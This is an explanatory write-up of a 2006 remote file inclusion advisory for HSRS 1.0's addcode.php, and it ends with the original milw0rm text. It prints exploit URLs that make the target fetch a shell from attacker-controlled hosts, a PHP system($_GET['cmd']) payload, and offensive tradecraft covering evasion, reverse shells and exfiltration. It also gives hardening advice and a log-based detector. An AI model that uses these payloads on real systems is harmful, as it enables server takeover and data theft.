HSRS 1.0 'addcode.php' Remote File Inclusion Explained

What this paper is
This paper, published by Cold Zero in 2006, details a Remote File Inclusion (RFI) vulnerability in version 1.0 of the HIOX Star Rating System Script (HSRS). The vulnerability exists in the addcode.php file, allowing an attacker to include and execute arbitrary PHP code from a remote server.
Simple technical breakdown
The core of the vulnerability lies in how addcode.php handles a variable named hm. The variable is used directly in a PHP include statement with no validation. The paper does not show where $hm is assigned; a bare variable that is filled straight from the query string in a 2006 PHP script points to register_globals being enabled (or to an assignment from $_GET/$_REQUEST that the paper does not reproduce). When an attacker sets hm to a URL, and the server's PHP permits URL wrappers in include (allow_url_fopen, plus allow_url_include from PHP 5.2.0 onward), the server fetches the remote content and executes it as if it were part of the original script.
The paper highlights a specific line of code: include "$hm/auth/config.php";. The line is meant to include a configuration file relative to the directory held in $hm. If an attacker sets $hm to a URL, the server fetches $hm/auth/config.php from that URL and executes whatever comes back; the hard-coded suffix is also the reason the published exploit ends its URL with a question mark.
Complete code and payload walkthrough
The provided paper does not contain the full source code of HSRS 1.0, nor does it provide explicit shellcode or a detailed payload. However, it points to the vulnerable line and provides an example of how to exploit it.
Vulnerable Code Snippet:
include "$hm/auth/config.php";
- What it is: a PHP include statement. include reads the named file and executes its contents as PHP.
- Input: the variable $hm, which the paper shows being used but neither assigned nor validated.
- Behavior: it includes the file at the path formed by concatenating $hm with the fixed suffix /auth/config.php.
- Output: if the file is found, its PHP code runs in the context of addcode.php; if not, PHP emits a warning (include, unlike require, continues execution).
- Vulnerability: $hm is not sanitized, and the script does not pin it to a local directory. If $hm is a URL such as http://attacker.example/evil.txt? and the server allows URL wrappers in include (allow_url_fopen, plus allow_url_include on PHP 5.2 and later), PHP fetches http://attacker.example/evil.txt?/auth/config.php over HTTP and executes whatever PHP code comes back. The trailing ? matters: without it the suffix becomes part of the requested path and the attacker's web server would answer with a 404.
Exploit Example from Paper:
http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd
- http://www.Victem.0/[PaTH]/addcode.php: the vulnerable HSRS script on the target; Victem.0 and [PaTH] are the author's placeholders for the host and the install directory.
- ?hm=: start of the query string; hm is the variable that ends up in the include.
- http://coldzero.shell?cmd: the attacker-controlled value. Only & separates parameters, so the second ? is just part of the value and reaches the script intact.
- http://coldzero.shell: placeholder for the attacker's host. The paper's own Example line uses a concrete location, http://www.violatorthrash.com/flyers/cold.txt?cmd: a .txt file, so the hosting server hands out the PHP source instead of executing it.
- ?cmd: the important part. The script appends /auth/config.php, so the target actually requests http://coldzero.shell?cmd/auth/config.php. The ? turns the hard-coded suffix into a query string, which the attacker's server ignores, so the shell file is still what gets served. The name cmd is conventional; any text (or nothing) after the ? works. The command itself is supplied as a separate parameter on the victim request, e.g. &cmd=id, because the included code runs on the target and reads the target's $_GET.
Payload Explanation (Inferred):
The paper implies that http://coldzero.shell hosts a small PHP script that executes commands. The file has to be served as plain text (hence the .txt extension in the paper's example): if the attacker's own web server executed it as PHP, the target would receive only its output, not code to run. A typical payload looks like this (an illustration of what the attacker might host, not code from the paper):
<?php
// evil.txt on the attacker's server, served raw (not executed there)
$cmd = $_GET['cmd']; // read the command from the victim request's cmd parameter
system($cmd);        // run it on the target and echo the output into the response
?>
- $cmd = $_GET['cmd'];: reads the cmd parameter. Because the code executes inside addcode.php on the target, $_GET is the target's request, so the attacker passes the command as &cmd=... on the exploit URL.
- system($cmd);: executes the command with the web server's privileges and prints its output into the HTTP response.
Mapping of Code Fragment/Block to Practical Purpose:
- include "$hm/auth/config.php"; -> Vulnerable Inclusion Point: where the RFI occurs. By controlling $hm, an attacker redirects the include to a remote file.
- ?hm=http://attacker.example/evil.txt? -> Attack Vector: injects the remote location; the trailing ? neutralises the appended /auth/config.php.
- http://attacker.example/evil.txt -> Remote Payload Host: the PHP source the target downloads and executes.
- &cmd=... -> Command Injection Point: a second parameter on the victim request, read by the included code through $_GET['cmd'].
Shellcode/Payload Segments:
The paper contains no shellcode bytes. The "payload" is the PHP source hosted by the attacker. The execution flow is:
- Attacker: requests http://victim/[PaTH]/addcode.php?hm=http://attacker.example/evil.txt?&cmd=some_command.
- Vulnerable Script (addcode.php): evaluates include "$hm/auth/config.php"; with $hm set to http://attacker.example/evil.txt?.
- PHP Interpreter: builds the include target http://attacker.example/evil.txt?/auth/config.php and, because it begins with http://, hands it to the HTTP stream wrapper.
- Network Fetch: the target server makes an outbound HTTP request to the attacker's server for /evil.txt; the suffix now sits in the query string and is ignored.
- Attacker Server: returns the raw PHP source of evil.txt.
- Target Server (Execution): the PHP interpreter compiles and runs the fetched source as part of addcode.php.
- Payload Execution: the code reads some_command from the target's own $_GET['cmd'] and passes it to system().
- Output: the command output is written into the HTTP response returned to the attacker. Whether it is visible depends on where the include sits in addcode.php's output; when it is not, a blind variant (a payload that calls back to a host the attacker watches) still confirms execution.
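The string handling behind the "PHP Interpreter" and "Network Fetch" steps above, as an added example (not code from the paper or from HSRS): a short Python model of how the include target is built for different hm values and what PHP would then do with it. attacker.example is a placeholder host, and the script performs no network I/O.

```python
"""Model how `include "$hm/auth/config.php"` resolves for different hm values.

Added example, not code from the paper or from HSRS. It only does string and
URL handling locally and performs no network requests. The host name
attacker.example is a placeholder.
"""
from urllib.parse import urlsplit

SUFFIX = "/auth/config.php"  # the fixed tail addcode.php appends to $hm

# Prefixes PHP's include treats as URL/stream wrappers rather than local paths
# (only honoured when allow_url_fopen, and on PHP >= 5.2 allow_url_include, are on).
URL_WRAPPERS = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def build_include_target(hm: str) -> str:
    """Reproduce the exact string the vulnerable include statement receives."""
    return f"{hm}{SUFFIX}"


def classify(target: str) -> dict:
    """Describe what PHP would do with the constructed include target.

    For a wrapper URL, 'path' is the resource the attacker's server is asked
    for and 'query' is where the appended suffix lands when hm ends in '?'.
    """
    if target.startswith(URL_WRAPPERS):
        parts = urlsplit(target)
        return {"kind": "remote", "host": parts.netloc,
                "path": parts.path, "query": parts.query}
    return {"kind": "local", "path": target}


def demo() -> dict:
    """Three hm values: the intended local use, a naive URL, and the paper's idiom."""
    cases = {
        # intended use: hm names the local install directory
        "intended": "hiox",
        # suffix is appended to the URL path, so the attacker host answers 404
        "naive remote": "http://attacker.example/shell.txt",
        # the paper's trailing '?cmd': the suffix becomes a query string the
        # attacker's server ignores, so shell.txt itself is served
        "paper's trick": "http://attacker.example/shell.txt?cmd",
    }
    return {name: classify(build_include_target(hm)) for name, hm in cases.items()}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:14s} -> {result}")
```

The "naive remote" case is why a bare URL in hm fails against this script even on a fully permissive PHP, and the "paper's trick" case is why the published exploit ends in ?cmd.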
Practical details for offensive operations teams
- Required Access Level: Low. This is a web application vulnerability, typically exploitable via a web browser or an automated scanner. No local access or elevated privileges are needed on the target server initially.
- Lab Preconditions:
- A target web server running PHP and hosting HSRS 1.0 (or a similarly vulnerable version), with allow_url_fopen enabled (and allow_url_include on PHP 5.2 and later) and a way for hm to reach the script: register_globals on, or an assignment from the request that the paper does not show.
- A controlled remote server reachable from the target over HTTP/HTTPS that serves the PHP payload as plain text (for example evil.txt), not as an executable PHP page.
- Knowledge of the path to addcode.php on the target.
- Tooling Assumptions:
- Web Browser: For manual testing and crafting URLs.
- Burp Suite / OWASP ZAP: For intercepting and modifying HTTP requests, automating payload delivery, and scanning.
- Metasploit Framework: the generic exploit/unix/webapp/php_include module drives PHP remote-include bugs of this kind and can deliver PHP payloads (including a PHP Meterpreter stage) instead of a hand-written shell.
- Custom Scripts: Python or other scripting languages for automating the process of finding vulnerable targets or delivering payloads.
- Remote Server: A simple web server (e.g., Apache, Nginx) to host the attacker's PHP payload.
- Execution Pitfalls:
- WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) are likely to detect standard RFI patterns. Obfuscation of URLs, payloads, or using less common protocols might be necessary.
- PHP Configuration (allow_url_fopen / allow_url_include): include and require only follow URLs when allow_url_fopen is on; from PHP 5.2.0 the separate allow_url_include directive (default off) is also required. Hardened or shared hosts of the period frequently disabled allow_url_fopen, which reduces this to a local-file inclusion at best. The bare $hm has its own dependency: with register_globals off the variable is never populated from the request unless the script assigns it.
- Payload Hosting Issues: the attacker's server must be reachable from the target and must return the PHP source verbatim. A .txt extension (as in the paper's example) is the usual way to stop the hosting server from executing it. Firewalls or egress filtering on the target's side can block the outbound fetch.
- Appended Suffix: the script appends /auth/config.php to whatever hm contains. A URL without a terminator makes the target request http://attacker.example/payload.txt/auth/config.php, which fails. The paper's ?cmd is exactly the fix: the ? pushes the suffix into the query string. On PHP before 5.3.4 with magic_quotes_gpc off a URL-encoded null byte (%00) also truncated the string, but the ? form is simpler and works on every version. The published example is therefore not ambiguous; it is the standard RFI idiom.
- Error Reporting: if display_errors is off and the include fails, the attacker sees nothing. Many operators verify first with a harmless marker file (one that only echoes a fixed string) before loading a shell.
- Content Served: PHP does not care about the remote file's extension; what matters is that the bytes returned are PHP source inside <?php ... ?> tags. A hosting server that executes .php files, a CDN that rewrites content, or an outbound proxy on the target that blocks the fetch all break the chain.
- Tradecraft Considerations:
- Reconnaissance: Identify web applications and their versions. Look for common PHP applications.
- Vulnerability Scanning: Use automated tools to scan for RFI vulnerabilities.
- Manual Verification: Crafting specific URLs to test for RFI.
- Payload Development: Create a versatile PHP payload that can execute commands, download further stages, or establish a reverse shell.
- Stealth: Avoid noisy scanning patterns. Use proxy chains or VPNs if necessary.
- Post-Exploitation: Once code execution is achieved, focus on privilege escalation, lateral movement, and data exfiltration, all within the scope of the authorized operation.
Where this was used and when
- Context: This vulnerability was found in the HIOX Star Rating System Script (HSRS) version 1.0. HSRS is a free PHP script designed to be added to web pages to allow users to rate content.
- Year: Published in 2006. This indicates the vulnerability was present in the script at least by that time. Exploits of this nature were common in web applications from the mid-2000s.
- Usage: Such vulnerabilities were typically exploited by attackers to deface websites, gain unauthorized access to servers, or use compromised servers as part of botnets. The paper itself is an example of a security researcher disclosing such a flaw.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most crucial lesson. Never trust user input. All data received from external sources (GET/POST parameters, cookies, file uploads) must be rigorously validated and sanitized before being used in file operations, database queries, or system commands.
- Secure Configuration:
- Disable allow_url_include (off by default since PHP 5.2.0) and, where nothing legitimately needs it, allow_url_fopen in php.ini. These directives are what let include reach over the network.
- Disable register_globals (removed in PHP 5.4); it is what lets an unassigned $hm be filled from the query string.
- Set open_basedir so that even a local inclusion is confined to the application tree, and fix the code itself: build include paths from a constant such as __DIR__ . '/auth/config.php' or from an allowlist, never from a request variable.
- Configure WAFs to detect and block common RFI patterns (parameter values beginning with a URL scheme or a PHP stream wrapper).
- Least Privilege Principle: Ensure web server processes run with the minimum necessary privileges. This limits the impact if an RFI exploit is successful.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software updated to the latest secure versions. Vulnerabilities like this are often patched in later releases.
- Code Auditing: Regularly audit custom and third-party code for common vulnerabilities like RFI, SQL injection, XSS, etc.
- Logging and Monitoring: Implement robust logging for web server access and PHP errors. Monitor logs for suspicious activity, such as requests to unusual URLs or attempts to include remote files.
- Secure Coding Practices: Train developers on secure coding principles. Use frameworks that enforce security best practices.
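For the logging-and-monitoring point, here is an added example (not from the paper or from HSRS) of a detector that runs over Apache/nginx combined-format access logs and reports query parameters whose decoded value starts with a URL or stream-wrapper scheme. The log lines are constructed for the example: the addresses come from documentation ranges and the HSRS paths are assumed.

```python
"""Flag likely remote-file-inclusion attempts in combined-format access logs.

Added example for the logging-and-monitoring point; it is not part of the paper
or of HSRS. SAMPLE_LOG is constructed for this example: the addresses come from
documentation ranges and the HSRS paths are assumed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes PHP's include can read from when allow_url_fopen/allow_url_include are on.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?)://|^(?:php|expect)://|^data:', re.I)

# Constructed sample: three RFI attempts against addcode.php, one traversal
# probe, and one legitimate-looking URL parameter on another script.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Nov/2006:10:12:01 +0000] "GET /HSRS/addcode.php?hm=http://203.0.113.9/cold.txt?cmd HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Nov/2006:10:12:05 +0000] "GET /HSRS/addcode.php?hm=http%3A%2F%2F203.0.113.9%2Fcold.txt%3F&cmd=id HTTP/1.1" 200 734 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Nov/2006:10:12:09 +0000] "GET /HSRS/addcode.php?hm=php://input HTTP/1.1" 200 120 "-" "Mozilla/4.0"
198.51.100.4 - - [23/Nov/2006:10:13:00 +0000] "GET /HSRS/addcode.php?hm=.. HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.5 - - [23/Nov/2006:10:14:00 +0000] "GET /HSRS/rate.php?id=42&url=http://www.example.com/page HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; attackers double-encode to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line: str, params=None) -> list:
    """Return findings for one log line.

    params: optional set of parameter names to inspect (e.g. {"hm"}); None
    inspects every parameter, which is noisier but catches unknown sinks.
    """
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    findings = []
    # parse_qsl decodes one layer; decode_fully handles double encoding on top
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if params is not None and name not in params:
            continue
        value = decode_fully(raw)
        if REMOTE_SCHEME_RE.search(value):
            findings.append({
                "src": m.group("src"),
                "script": parts.path,
                "param": name,
                "value": value,
                # a '?' or NUL after the scheme is the trick for swallowing a
                # suffix that the vulnerable script appends to the include path
                "suffix_trick": "?" in value or "\x00" in value,
            })
    return findings


def scan(log_text: str, params=None) -> list:
    """Run inspect_line over every line of a log and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        findings.extend(inspect_line(line, params))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, params={"hm"}):
        print(hit)
```

Run unrestricted, the rule also fires on the last sample line, where a URL is a legitimate parameter value; in practice scope it to the parameters that reach include/require (here hm) or pair it with the web server's outbound connection logs, since a successful RFI always produces an HTTP request from the web server to a host it never normally contacts.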
ASCII visual (if applicable)
The exploit involves three parties: the attacker's machine, the target web server, and the server the attacker uses to host the payload. The target, not the attacker, is the one that fetches the payload.
+-----------------+                                   +-----------------+
|   Attacker's    |  1. GET /[PaTH]/addcode.php?hm=   |   Target Web    |
|     Machine     |     http://attacker/s.txt?&cmd=id |     Server      |
|  (crafts URL)   | --------------------------------> | (vulnerable app)|
|                 |                                   |                 |
|                 |  5. HTTP response carrying the    |                 |
|                 |     output of id                  |                 |
|                 | <-------------------------------- |                 |
+-----------------+                                   +--------+-----+--+
                                                               |     ^
                    2. include "$hm/auth/config.php" fetches  |     ^  3. serves s.txt as
                       http://attacker/s.txt?/auth/config.php  |     ^     plain text (PHP source,
                       (the ? turns the suffix into a query)   |     ^     not executed there)
                                                               v     |
                                                      +--------+-----+--+
                                                      |   Attacker's    |
                                                      |  Remote Server  |
                                                      |  (hosts s.txt)  |
                                                      +-----------------+

                    4. the target's PHP interpreter executes the fetched source as part of
                       addcode.php (e.g. system($_GET['cmd'])), so cmd is read from the victim request
Source references
- Paper URL: https://www.exploit-db.com/papers/2838
- Raw Exploit URL: https://www.exploit-db.com/raw/2838
- Software Affected: HSRS 1.0 (HIOX Star Rating System Script)
- Vulnerable File: addcode.php
- Vulnerability Type: Remote File Inclusion (RFI)
- Published Date: 2006-11-23
Original Exploit-DB Content (Verbatim)
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File
Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : include_once ($4AZHAR_TeAM."Securty.");
require ($SpECiALPowEr.oRg_TeAm."Securty");
A_mal Hackeing Team _ Hacking
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# HSRS 1.0 (HIOX Star Rating System Script)
#
# Class: Remote File Include Vulnerability
# Published 2006-11-23
# Remote: Yes
# Type: High
# Site: http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author: Cold Zero
# Contact: c.o.1.d.0@hotmail.com
#
######################################################
About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.
==========================
file ;
addcode.php
==========================
include "$hm/auth/config.php";
======================================================
Example:
http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd
======================================================
Exploit :
Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd
======================================================
---- GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-11-23]